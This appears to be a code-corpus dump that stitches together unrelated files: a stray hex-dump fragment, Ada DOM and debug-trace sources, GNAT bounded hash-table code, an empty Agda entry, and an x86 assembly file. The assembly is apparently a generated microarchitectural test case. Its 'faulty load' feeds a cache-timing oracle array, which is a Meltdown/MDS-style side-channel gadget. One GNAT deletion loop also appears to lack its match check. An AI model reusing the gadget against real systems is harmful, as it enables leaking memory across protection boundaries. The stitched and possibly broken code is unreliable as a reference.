00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 */
source/xml/dom/matreshka-dom_attributes.adb
svn2github/matreshka
24
15390
<gh_stars>10-100 ------------------------------------------------------------------------------ -- -- -- Matreshka Project -- -- -- -- XML Processor -- -- -- -- Runtime Library Component -- -- -- ------------------------------------------------------------------------------ -- -- -- Copyright © 2014, <NAME> <<EMAIL>> -- -- All rights reserved. -- -- -- -- Redistribution and use in source and binary forms, with or without -- -- modification, are permitted provided that the following conditions -- -- are met: -- -- -- -- * Redistributions of source code must retain the above copyright -- -- notice, this list of conditions and the following disclaimer. -- -- -- -- * Redistributions in binary form must reproduce the above copyright -- -- notice, this list of conditions and the following disclaimer in the -- -- documentation and/or other materials provided with the distribution. -- -- -- -- * Neither the name of the <NAME>, IE nor the names of its -- -- contributors may be used to endorse or promote products derived from -- -- this software without specific prior written permission. -- -- -- -- THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS -- -- "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT -- -- LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR -- -- A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT -- -- HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, -- -- SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED -- -- TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR -- -- PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF -- -- LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING -- -- NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS -- -- SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -- -- -- ------------------------------------------------------------------------------ -- $Revision$ $Date$ ------------------------------------------------------------------------------ with Matreshka.DOM_Documents; with Matreshka.DOM_Lists; with XML.DOM.Entity_References; with XML.DOM.Texts; package body Matreshka.DOM_Attributes is use type Matreshka.DOM_Nodes.Node_Access; ------------------ -- Constructors -- ------------------ package body Constructors is ---------------- -- Initialize -- ---------------- procedure Initialize (Self : not null access Attribute_L1_Node'Class; Document : not null Matreshka.DOM_Nodes.Document_Access) is begin Matreshka.DOM_Nodes.Constructors.Initialize (Self, Document); end Initialize; ---------------- -- Initialize -- ---------------- procedure Initialize (Self : not null access Abstract_Attribute_L2_Node'Class; Document : not null Matreshka.DOM_Nodes.Document_Access) is begin Matreshka.DOM_Nodes.Constructors.Initialize (Self, Document); end Initialize; end Constructors; ------------ -- Create -- ------------ overriding function Create (Parameters : not null access Attribute_L2_Parameters) return Attribute_L2_Node is begin return Self : Attribute_L2_Node do Matreshka.DOM_Attributes.Constructors.Initialize (Self'Unchecked_Access, Parameters.Document); Self.Namespace_URI := Parameters.Namespace_URI; Self.Prefix := Parameters.Prefix; Self.Local_Name := Parameters.Local_Name; end return; end Create; ---------------- -- Enter_Node -- ---------------- overriding procedure Enter_Node (Self : not null access Abstract_Attribute_Node; Visitor : in out XML.DOM.Visitors.Abstract_Visitor'Class; Control : in out XML.DOM.Visitors.Traverse_Control) is pragma Unreferenced (Self); pragma Unreferenced (Visitor); pragma Unreferenced (Control); begin raise Program_Error; end Enter_Node; -------------------- -- Get_Local_Name -- -------------------- overriding function Get_Local_Name (Self : not null access constant Attribute_L2_Node) return League.Strings.Universal_String is begin return Self.Local_Name; end Get_Local_Name; -------------- -- Get_Name -- -------------- overriding function Get_Name (Self : not null access constant Attribute_L1_Node) return League.Strings.Universal_String is begin raise Program_Error; return League.Strings.Empty_Universal_String; end Get_Name; -------------- -- Get_Name -- -------------- overriding function Get_Name (Self : not null access constant Abstract_Attribute_L2_Node) return League.Strings.Universal_String is begin -- return Self.Get_Prefix & ':' & Self.Get_Local_Name; raise Program_Error; return League.Strings.Empty_Universal_String; end Get_Name; ----------------------- -- Get_Namespace_URI -- ----------------------- overriding function Get_Namespace_URI (Self : not null access constant Attribute_L2_Node) return League.Strings.Universal_String is begin return Self.Namespace_URI; end Get_Namespace_URI; ---------------------- -- Get_Next_Sibling -- ---------------------- overriding function Get_Next_Sibling (Self : not null access constant Abstract_Attribute_Node) return XML.DOM.Nodes.DOM_Node_Access is pragma Unreferenced (Self); begin return null; end Get_Next_Sibling; ------------------- -- Get_Node_Type -- ------------------- overriding function Get_Node_Type (Self : not null access constant Abstract_Attribute_Node) return XML.DOM.Node_Type is pragma Unreferenced (Self); begin return XML.DOM.Attribute_Node; end Get_Node_Type; ----------------------- -- Get_Owner_Element -- ----------------------- overriding function Get_Owner_Element (Self : not null access constant Abstract_Attribute_Node) return XML.DOM.Elements.DOM_Element_Access is begin return XML.DOM.Elements.DOM_Element_Access (Self.Parent); end Get_Owner_Element; --------------------- -- Get_Parent_Node -- --------------------- overriding function Get_Parent_Node (Self : not null access constant Abstract_Attribute_Node) return XML.DOM.Nodes.DOM_Node_Access is pragma Unreferenced (Self); begin return null; end Get_Parent_Node; -------------------------- -- Get_Previous_Sibling -- -------------------------- overriding function Get_Previous_Sibling (Self : not null access constant Abstract_Attribute_Node) return XML.DOM.Nodes.DOM_Node_Access is pragma Unreferenced (Self); begin return null; end Get_Previous_Sibling; --------------- -- Get_Value -- --------------- overriding function Get_Value (Self : not null access constant Abstract_Attribute_Node) return League.Strings.Universal_String is N : Matreshka.DOM_Nodes.Node_Access := Self.First; begin -- Lookup for the first DOM::Text child node by unwinding all -- DOM::EntityReference nodes. Returns its whole text if it is found. while N /= null loop if N.all in XML.DOM.Texts.DOM_Text'Class then return XML.DOM.Texts.DOM_Text_Access (N).Get_Whole_Text; else N := N.First; end if; end loop; return League.Strings.Empty_Universal_String; end Get_Value; ---------------- -- Leave_Node -- ---------------- overriding procedure Leave_Node (Self : not null access Abstract_Attribute_Node; Visitor : in out XML.DOM.Visitors.Abstract_Visitor'Class; Control : in out XML.DOM.Visitors.Traverse_Control) is pragma Unreferenced (Self); pragma Unreferenced (Visitor); pragma Unreferenced (Control); begin raise Program_Error; end Leave_Node; --------------- -- Set_Value -- --------------- overriding procedure Set_Value (Self : not null access Abstract_Attribute_Node; New_Value : League.Strings.Universal_String) is Node : Matreshka.DOM_Nodes.Node_Access; Text : XML.DOM.Texts.DOM_Text_Access; begin -- Remove all existing child nodes. while Self.First /= null loop Node := Self.First; Matreshka.DOM_Lists.Remove_From_Children (Node); Matreshka.DOM_Lists.Insert_Into_Detached (Node); end loop; -- Create new text node and set its value. Text := Self.Document.Create_Text_Node (New_Value); Self.Append_Child (XML.DOM.Nodes.DOM_Node_Access (Text)); end Set_Value; ---------------- -- Visit_Node -- ---------------- overriding procedure Visit_Node (Self : not null access Abstract_Attribute_Node; Iterator : in out XML.DOM.Visitors.Abstract_Iterator'Class; Visitor : in out XML.DOM.Visitors.Abstract_Visitor'Class; Control : in out XML.DOM.Visitors.Traverse_Control) is pragma Unreferenced (Self); pragma Unreferenced (Visitor); pragma Unreferenced (Control); begin raise Program_Error; end Visit_Node; end Matreshka.DOM_Attributes;
src/_for_debug_purposes/apsepp-debug_trace_class-standard.ads
thierr26/ada-apsepp
0
14278
-- Copyright (C) 2019 <NAME> <<EMAIL>> -- MIT license. Please refer to the LICENSE file. private with Apsepp.Debug_Trace_Class.Stub.Create; package Apsepp.Debug_Trace_Class.Standard is ---------------------------------------------------------------------------- protected type Debug_Trace_Standard is new Debug_Trace_Interfa with overriding function Message_W_Entity (Message : String; Entity_Name : String) return String; overriding function E_To_String (E : Exception_Occurrence) return String; -- TODOC: Calls primitive Clock_String of -- Apsepp.Debug_Trace_Class.Stub.Debug_Trace_Stub. So the reset -- applies to all Debug_Trace_Interfa'Class objects with an -- implementation relying on Reset_Date_Handler. <2019-06-29> overriding function Clock_String (Reset_Elapsed : Boolean := False) return String; overriding procedure Trace (Message : String; Entity_Name : String := ""); overriding procedure Trace_E (E : Exception_Occurrence; Entity_Name : String := ""); -- TODOC: Calls primitive Set_Time_Zone of -- Apsepp.Debug_Trace_Class.Stub.Debug_Trace_Stub so affects all -- Debug_Trace_Interfa'Class objects with an implementation relying on -- Reset_Date_Handler. <2019-06-29> overriding procedure Set_Time_Zone (Time_Zone : Time_Offset); -- TODOC: Ditto. <2019-06-29> overriding procedure Set_Local_Time_Zone; -- TODOC: CallsClock_String. So the reset applies to all -- Debug_Trace_Interfa'Class objects with an implementation relying on -- Reset_Date_Handler. <2019-06-29> overriding procedure Trace_Time (Entity_Name : String := ""; Reset_Elapsed : Boolean := False); end Debug_Trace_Standard; ---------------------------------------------------------------------------- private use Stub; Debug_Trace_Stub_Instance : Debug_Trace_Stub := Create; end Apsepp.Debug_Trace_Class.Standard;
Transynther/x86/_processed/P/_ht_un_/i9-9900K_12_0xca.log_625_1489.asm
ljhsiun2/medusa
9
9184
<reponame>ljhsiun2/medusa .global s_prepare_buffers s_prepare_buffers: push %r11 push %r14 push %r15 push %r8 push %rax push %rbp push %rcx push %rdi push %rdx push %rsi lea addresses_WT_ht+0x1153c, %r11 nop nop nop cmp $4522, %rdx movl $0x61626364, (%r11) nop nop cmp $33816, %r8 lea addresses_UC_ht+0x18094, %r14 nop nop sub %rax, %rax movups (%r14), %xmm4 vpextrq $0, %xmm4, %rbp nop xor %rbp, %rbp lea addresses_D_ht+0x10cb4, %rbp clflush (%rbp) inc %r11 movups (%rbp), %xmm7 vpextrq $0, %xmm7, %r14 nop nop nop nop sub %r8, %r8 lea addresses_normal_ht+0x126d4, %rax nop nop nop nop nop add $35401, %rdx movw $0x6162, (%rax) nop add %rax, %rax lea addresses_UC_ht+0x9c94, %rax nop nop cmp %r14, %r14 mov (%rax), %r15 nop nop nop cmp $34179, %rdx lea addresses_D_ht+0x44b4, %rbp nop nop dec %r14 mov $0x6162636465666768, %rax movq %rax, %xmm6 vmovups %ymm6, (%rbp) nop nop nop xor %rbp, %rbp lea addresses_normal_ht+0x132f4, %rsi lea addresses_WT_ht+0x9894, %rdi nop nop nop nop nop and %r8, %r8 mov $14, %rcx rep movsb nop and %rdi, %rdi lea addresses_A_ht+0x8094, %rax nop nop nop nop nop sub $36971, %rdx mov (%rax), %r14 nop nop cmp %rsi, %rsi lea addresses_normal_ht+0x2f94, %rdi clflush (%rdi) nop nop cmp $37743, %rbp mov $0x6162636465666768, %rdx movq %rdx, %xmm6 movups %xmm6, (%rdi) nop nop nop nop and %rax, %rax lea addresses_WC_ht+0xd018, %rax and %r15, %r15 movl $0x61626364, (%rax) cmp %rsi, %rsi lea addresses_WC_ht+0x3194, %rbp and %rcx, %rcx mov $0x6162636465666768, %rax movq %rax, %xmm7 movups %xmm7, (%rbp) nop nop xor %rcx, %rcx lea addresses_D_ht+0x42de, %r11 clflush (%r11) dec %rdi movb (%r11), %r14b nop nop nop add $33024, %rbp lea addresses_D_ht+0x9994, %r8 nop nop nop nop cmp %rax, %rax movl $0x61626364, (%r8) inc %rsi lea addresses_A_ht+0xc494, %rsi lea addresses_D_ht+0xac5c, %rdi nop nop nop nop sub %rax, %rax mov $60, %rcx rep movsw nop nop nop add %rbp, %rbp pop %rsi pop %rdx pop %rdi pop %rcx pop %rbp pop %rax pop %r8 pop %r15 pop %r14 pop %r11 ret .global s_faulty_load s_faulty_load: push %r11 push %r13 push %rax push %rbp push %rsi // Faulty Load mov $0x94, %rax nop sub $17407, %r11 movups (%rax), %xmm1 vpextrq $1, %xmm1, %rbp lea oracles, %rsi and $0xff, %rbp shlq $12, %rbp mov (%rsi,%rbp,1), %rbp pop %rsi pop %rbp pop %rax pop %r13 pop %r11 ret /* <gen_faulty_load> [REF] {'OP': 'LOAD', 'src': {'size': 2, 'NT': False, 'type': 'addresses_P', 'same': False, 'AVXalign': True, 'congruent': 0}} [Faulty Load] {'OP': 'LOAD', 'src': {'size': 16, 'NT': False, 'type': 'addresses_P', 'same': True, 'AVXalign': False, 'congruent': 0}} <gen_prepare_buffer> {'OP': 'STOR', 'dst': {'size': 4, 'NT': False, 'type': 'addresses_WT_ht', 'same': False, 'AVXalign': True, 'congruent': 2}} {'OP': 'LOAD', 'src': {'size': 16, 'NT': False, 'type': 'addresses_UC_ht', 'same': False, 'AVXalign': False, 'congruent': 11}} {'OP': 'LOAD', 'src': {'size': 16, 'NT': False, 'type': 'addresses_D_ht', 'same': False, 'AVXalign': False, 'congruent': 2}} {'OP': 'STOR', 'dst': {'size': 2, 'NT': False, 'type': 'addresses_normal_ht', 'same': True, 'AVXalign': False, 'congruent': 5}} {'OP': 'LOAD', 'src': {'size': 8, 'NT': False, 'type': 'addresses_UC_ht', 'same': False, 'AVXalign': False, 'congruent': 10}} {'OP': 'STOR', 'dst': {'size': 32, 'NT': False, 'type': 'addresses_D_ht', 'same': False, 'AVXalign': False, 'congruent': 5}} {'OP': 'REPM', 'src': {'same': False, 'type': 'addresses_normal_ht', 'congruent': 5}, 'dst': {'same': False, 'type': 'addresses_WT_ht', 'congruent': 10}} {'OP': 'LOAD', 'src': {'size': 8, 'NT': False, 'type': 'addresses_A_ht', 'same': False, 'AVXalign': False, 'congruent': 11}} {'OP': 'STOR', 'dst': {'size': 16, 'NT': False, 'type': 'addresses_normal_ht', 'same': False, 'AVXalign': False, 'congruent': 7}} {'OP': 'STOR', 'dst': {'size': 4, 'NT': False, 'type': 'addresses_WC_ht', 'same': False, 'AVXalign': False, 'congruent': 2}} {'OP': 'STOR', 'dst': {'size': 16, 'NT': False, 'type': 'addresses_WC_ht', 'same': False, 'AVXalign': False, 'congruent': 7}} {'OP': 'LOAD', 'src': {'size': 1, 'NT': False, 'type': 'addresses_D_ht', 'same': False, 'AVXalign': False, 'congruent': 1}} {'OP': 'STOR', 'dst': {'size': 4, 'NT': False, 'type': 'addresses_D_ht', 'same': False, 'AVXalign': False, 'congruent': 8}} {'OP': 'REPM', 'src': {'same': False, 'type': 'addresses_A_ht', 'congruent': 10}, 'dst': {'same': False, 'type': 'addresses_D_ht', 'congruent': 2}} {'ff': 1, '45': 614, 'fe': 4, '46': 6} 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 fe 45 45 45 45 45 45 45 45 45 45 45 45 45 45 46 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 46 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 ff 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 46 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 fe 45 45 45 45 45 45 45 45 45 45 45 45 45 46 45 45 45 45 45 45 45 45 46 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 46 45 45 45 45 45 45 45 45 45 45 45 45 fe 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 fe 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 */
gcc-gcc-7_3_0-release/gcc/ada/a-chtgbo.adb
best08618/asylo
7
11560
<reponame>best08618/asylo ------------------------------------------------------------------------------ -- -- -- GNAT LIBRARY COMPONENTS -- -- -- -- ADA.CONTAINERS.HASH_TABLES.GENERIC_BOUNDED_OPERATIONS -- -- -- -- B o d y -- -- -- -- Copyright (C) 2004-2016, Free Software Foundation, Inc. -- -- -- -- GNAT is free software; you can redistribute it and/or modify it under -- -- terms of the GNU General Public License as published by the Free Soft- -- -- ware Foundation; either version 3, or (at your option) any later ver- -- -- sion. GNAT is distributed in the hope that it will be useful, but WITH- -- -- OUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY -- -- or FITNESS FOR A PARTICULAR PURPOSE. -- -- -- -- As a special exception under Section 7 of GPL version 3, you are granted -- -- additional permissions described in the GCC Runtime Library Exception, -- -- version 3.1, as published by the Free Software Foundation. -- -- -- -- You should have received a copy of the GNU General Public License and -- -- a copy of the GCC Runtime Library Exception along with this program; -- -- see the files COPYING3 and COPYING.RUNTIME respectively. If not, see -- -- <http://www.gnu.org/licenses/>. -- -- -- -- This unit was originally developed by <NAME>. -- ------------------------------------------------------------------------------ with System; use type System.Address; package body Ada.Containers.Hash_Tables.Generic_Bounded_Operations is pragma Warnings (Off, "variable ""Busy*"" is not referenced"); pragma Warnings (Off, "variable ""Lock*"" is not referenced"); -- See comment in Ada.Containers.Helpers ------------------- -- Checked_Index -- ------------------- function Checked_Index (Hash_Table : aliased in out Hash_Table_Type'Class; Node : Count_Type) return Hash_Type is Lock : With_Lock (Hash_Table.TC'Unrestricted_Access); begin return Index (Hash_Table, Hash_Table.Nodes (Node)); end Checked_Index; ----------- -- Clear -- ----------- procedure Clear (HT : in out Hash_Table_Type'Class) is begin TC_Check (HT.TC); HT.Length := 0; -- HT.Busy := 0; -- HT.Lock := 0; HT.Free := -1; HT.Buckets := (others => 0); -- optimize this somehow ??? end Clear; -------------------------- -- Delete_Node_At_Index -- -------------------------- procedure Delete_Node_At_Index (HT : in out Hash_Table_Type'Class; Indx : Hash_Type; X : Count_Type) is Prev : Count_Type; Curr : Count_Type; begin Prev := HT.Buckets (Indx); if Checks and then Prev = 0 then raise Program_Error with "attempt to delete node from empty hash bucket"; end if; if Prev = X then HT.Buckets (Indx) := Next (HT.Nodes (Prev)); HT.Length := HT.Length - 1; return; end if; if Checks and then HT.Length = 1 then raise Program_Error with "attempt to delete node not in its proper hash bucket"; end if; loop Curr := Next (HT.Nodes (Prev)); if Checks and then Curr = 0 then raise Program_Error with "attempt to delete node not in its proper hash bucket"; end if; Prev := Curr; end loop; end Delete_Node_At_Index; --------------------------- -- Delete_Node_Sans_Free -- --------------------------- procedure Delete_Node_Sans_Free (HT : in out Hash_Table_Type'Class; X : Count_Type) is pragma Assert (X /= 0); Indx : Hash_Type; Prev : Count_Type; Curr : Count_Type; begin if Checks and then HT.Length = 0 then raise Program_Error with "attempt to delete node from empty hashed container"; end if; Indx := Checked_Index (HT, X); Prev := HT.Buckets (Indx); if Checks and then Prev = 0 then raise Program_Error with "attempt to delete node from empty hash bucket"; end if; if Prev = X then HT.Buckets (Indx) := Next (HT.Nodes (Prev)); HT.Length := HT.Length - 1; return; end if; if Checks and then HT.Length = 1 then raise Program_Error with "attempt to delete node not in its proper hash bucket"; end if; loop Curr := Next (HT.Nodes (Prev)); if Checks and then Curr = 0 then raise Program_Error with "attempt to delete node not in its proper hash bucket"; end if; if Curr = X then Set_Next (HT.Nodes (Prev), Next => Next (HT.Nodes (Curr))); HT.Length := HT.Length - 1; return; end if; Prev := Curr; end loop; end Delete_Node_Sans_Free; ----------- -- First -- ----------- function First (HT : Hash_Table_Type'Class) return Count_Type is Indx : Hash_Type; begin if HT.Length = 0 then return 0; end if; Indx := HT.Buckets'First; loop if HT.Buckets (Indx) /= 0 then return HT.Buckets (Indx); end if; Indx := Indx + 1; end loop; end First; ---------- -- Free -- ---------- procedure Free (HT : in out Hash_Table_Type'Class; X : Count_Type) is N : Nodes_Type renames HT.Nodes; begin -- This subprogram "deallocates" a node by relinking the node off of the -- active list and onto the free list. Previously it would flag index -- value 0 as an error. The precondition was weakened, so that index -- value 0 is now allowed, and this value is interpreted to mean "do -- nothing". This makes its behavior analogous to the behavior of -- Ada.Unchecked_Deallocation, and allows callers to avoid having to add -- special-case checks at the point of call. if X = 0 then return; end if; pragma Assert (X <= HT.Capacity); -- pragma Assert (N (X).Prev >= 0); -- node is active -- Find a way to mark a node as active vs. inactive; we could -- use a special value in Color_Type for this. ??? -- The hash table actually contains two data structures: a list for -- the "active" nodes that contain elements that have been inserted -- onto the container, and another for the "inactive" nodes of the free -- store. -- -- We desire that merely declaring an object should have only minimal -- cost; specially, we want to avoid having to initialize the free -- store (to fill in the links), especially if the capacity is large. -- -- The head of the free list is indicated by Container.Free. If its -- value is non-negative, then the free store has been initialized -- in the "normal" way: Container.Free points to the head of the list -- of free (inactive) nodes, and the value 0 means the free list is -- empty. Each node on the free list has been initialized to point -- to the next free node (via its Parent component), and the value 0 -- means that this is the last free node. -- -- If Container.Free is negative, then the links on the free store -- have not been initialized. In this case the link values are -- implied: the free store comprises the components of the node array -- started with the absolute value of Container.Free, and continuing -- until the end of the array (Nodes'Last). -- -- ??? -- It might be possible to perform an optimization here. Suppose that -- the free store can be represented as having two parts: one -- comprising the non-contiguous inactive nodes linked together -- in the normal way, and the other comprising the contiguous -- inactive nodes (that are not linked together, at the end of the -- nodes array). This would allow us to never have to initialize -- the free store, except in a lazy way as nodes become inactive. -- When an element is deleted from the list container, its node -- becomes inactive, and so we set its Next component to value of -- the node's index (in the nodes array), to indicate that it is -- now inactive. This provides a useful way to detect a dangling -- cursor reference. ??? Set_Next (N (X), Next => X); -- Node is deallocated (not on active list) if HT.Free >= 0 then -- The free store has previously been initialized. All we need to -- do here is link the newly-free'd node onto the free list. Set_Next (N (X), HT.Free); HT.Free := X; elsif X + 1 = abs HT.Free then -- The free store has not been initialized, and the node becoming -- inactive immediately precedes the start of the free store. All -- we need to do is move the start of the free store back by one. HT.Free := HT.Free + 1; else -- The free store has not been initialized, and the node becoming -- inactive does not immediately precede the free store. Here we -- first initialize the free store (meaning the links are given -- values in the traditional way), and then link the newly-free'd -- node onto the head of the free store. -- ??? -- See the comments above for an optimization opportunity. If -- the next link for a node on the free store is negative, then -- this means the remaining nodes on the free store are -- physically contiguous, starting as the absolute value of -- that index value. HT.Free := abs HT.Free; if HT.Free > HT.Capacity then HT.Free := 0; else for I in HT.Free .. HT.Capacity - 1 loop Set_Next (Node => N (I), Next => I + 1); end loop; Set_Next (Node => N (HT.Capacity), Next => 0); end if; Set_Next (Node => N (X), Next => HT.Free); HT.Free := X; end if; end Free; ---------------------- -- Generic_Allocate -- ---------------------- procedure Generic_Allocate (HT : in out Hash_Table_Type'Class; Node : out Count_Type) is N : Nodes_Type renames HT.Nodes; begin if HT.Free >= 0 then Node := HT.Free; -- We always perform the assignment first, before we -- change container state, in order to defend against -- exceptions duration assignment. Set_Element (N (Node)); HT.Free := Next (N (Node)); else -- A negative free store value means that the links of the nodes -- in the free store have not been initialized. In this case, the -- nodes are physically contiguous in the array, starting at the -- index that is the absolute value of the Container.Free, and -- continuing until the end of the array (Nodes'Last). Node := abs HT.Free; -- As above, we perform this assignment first, before modifying -- any container state. Set_Element (N (Node)); HT.Free := HT.Free - 1; end if; end Generic_Allocate; ------------------- -- Generic_Equal -- ------------------- function Generic_Equal (L, R : Hash_Table_Type'Class) return Boolean is -- Per AI05-0022, the container implementation is required to detect -- element tampering by a generic actual subprogram. Lock_L : With_Lock (L.TC'Unrestricted_Access); Lock_R : With_Lock (R.TC'Unrestricted_Access); L_Index : Hash_Type; L_Node : Count_Type; N : Count_Type; begin if L'Address = R'Address then return True; end if; if L.Length /= R.Length then return False; end if; if L.Length = 0 then return True; end if; -- Find the first node of hash table L L_Index := L.Buckets'First; loop L_Node := L.Buckets (L_Index); exit when L_Node /= 0; L_Index := L_Index + 1; end loop; -- For each node of hash table L, search for an equivalent node in hash -- table R. N := L.Length; loop if not Find (HT => R, Key => L.Nodes (L_Node)) then return False; end if; N := N - 1; L_Node := Next (L.Nodes (L_Node)); if L_Node = 0 then -- We have exhausted the nodes in this bucket if N = 0 then return True; end if; -- Find the next bucket loop L_Index := L_Index + 1; L_Node := L.Buckets (L_Index); exit when L_Node /= 0; end loop; end if; end loop; end Generic_Equal; ----------------------- -- Generic_Iteration -- ----------------------- procedure Generic_Iteration (HT : Hash_Table_Type'Class) is Node : Count_Type; begin if HT.Length = 0 then return; end if; for Indx in HT.Buckets'Range loop Node := HT.Buckets (Indx); while Node /= 0 loop Process (Node); Node := Next (HT.Nodes (Node)); end loop; end loop; end Generic_Iteration; ------------------ -- Generic_Read -- ------------------ procedure Generic_Read (Stream : not null access Root_Stream_Type'Class; HT : out Hash_Table_Type'Class) is N : Count_Type'Base; begin Clear (HT); Count_Type'Base'Read (Stream, N); if Checks and then N < 0 then raise Program_Error with "stream appears to be corrupt"; end if; if N = 0 then return; end if; if Checks and then N > HT.Capacity then raise Capacity_Error with "too many elements in stream"; end if; for J in 1 .. N loop declare Node : constant Count_Type := New_Node (Stream); Indx : constant Hash_Type := Checked_Index (HT, Node); B : Count_Type renames HT.Buckets (Indx); begin Set_Next (HT.Nodes (Node), Next => B); B := Node; end; HT.Length := HT.Length + 1; end loop; end Generic_Read; ------------------- -- Generic_Write -- ------------------- procedure Generic_Write (Stream : not null access Root_Stream_Type'Class; HT : Hash_Table_Type'Class) is procedure Write (Node : Count_Type); pragma Inline (Write); procedure Write is new Generic_Iteration (Write); ----------- -- Write -- ----------- procedure Write (Node : Count_Type) is begin Write (Stream, HT.Nodes (Node)); end Write; begin Count_Type'Base'Write (Stream, HT.Length); Write (HT); end Generic_Write; ----------- -- Index -- ----------- function Index (Buckets : Buckets_Type; Node : Node_Type) return Hash_Type is begin return Buckets'First + Hash_Node (Node) mod Buckets'Length; end Index; function Index (HT : Hash_Table_Type'Class; Node : Node_Type) return Hash_Type is begin return Index (HT.Buckets, Node); end Index; ---------- -- Next -- ---------- function Next (HT : Hash_Table_Type'Class; Node : Count_Type) return Count_Type is Result : Count_Type; First : Hash_Type; begin Result := Next (HT.Nodes (Node)); if Result /= 0 then -- another node in same bucket return Result; end if; -- This was the last node in the bucket, so move to the next -- bucket, and start searching for next node from there. First := Checked_Index (HT'Unrestricted_Access.all, Node) + 1; for Indx in First .. HT.Buckets'Last loop Result := HT.Buckets (Indx); if Result /= 0 then -- bucket is not empty return Result; end if; end loop; return 0; end Next; end Ada.Containers.Hash_Tables.Generic_Bounded_Operations;
test/Compiler/simple/Issue4169-2.agda
shlevy/agda
1,989
401
